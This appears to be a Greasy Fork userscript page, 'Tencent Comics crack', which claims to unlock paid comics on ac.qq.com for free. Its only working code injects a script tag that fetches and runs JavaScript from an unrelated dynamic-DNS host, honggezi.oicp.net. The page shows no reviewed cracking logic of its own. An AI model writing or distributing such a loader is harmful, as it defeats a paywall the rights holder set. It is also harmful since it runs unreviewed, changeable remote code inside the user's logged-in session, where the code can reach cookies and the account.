腾讯动漫-破解

腾讯动漫免费看,破解收费动漫。

As of 2016-02-06. See the latest version.

// ==UserScript==
// @name         腾讯动漫-破解
// @version      0.1
// @description  腾讯动漫免费看,破解收费动漫。
// @author      feilong
// @match        http://ac.qq.com/ComicView/index/id/*
// @grant        none
// @namespace https://greasyfork.org/users/28687
// ==/UserScript==
/* jshint -W097 */
'use strict';

// Your code here...
// 下脚本来自http://www.xker.com/page/e2015/07/212347.html
//
var a=null;
a=document.createElement("script");
a.setAttribute("src","//honggezi.oicp.net/api.php?api_name=txmh_reader/get_client.js");
document.body.appendChild(a);